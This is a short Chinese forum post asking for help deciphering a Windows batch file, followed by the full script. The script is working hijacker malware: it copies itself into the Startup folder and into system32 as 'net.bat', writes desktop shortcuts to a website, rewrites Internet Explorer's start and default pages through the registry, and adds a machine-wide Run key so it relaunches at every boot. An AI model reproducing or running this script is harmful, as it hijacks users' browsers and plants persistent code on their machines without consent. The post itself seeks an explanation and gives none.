返回列表 发帖

请教谁能解密 bat文件

@echo off
@copy %0 "%userprofile%\「开始」菜单\程序\启动"\system.bat
copy %0 %windir%\system32\net.bat /y
echo [InternetShortcut] >"%userprofile%\桌面\趣乐网QuleNet.com.url"
echo URL=http://www.qulenet.com/ >>"%userprofile%\桌面\趣乐网3ast.com.cn.url"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.3ast.com.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.3ast.com.cn/ /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Net /t REG_SZ /d %windir%\system32\net.bat /f

返回列表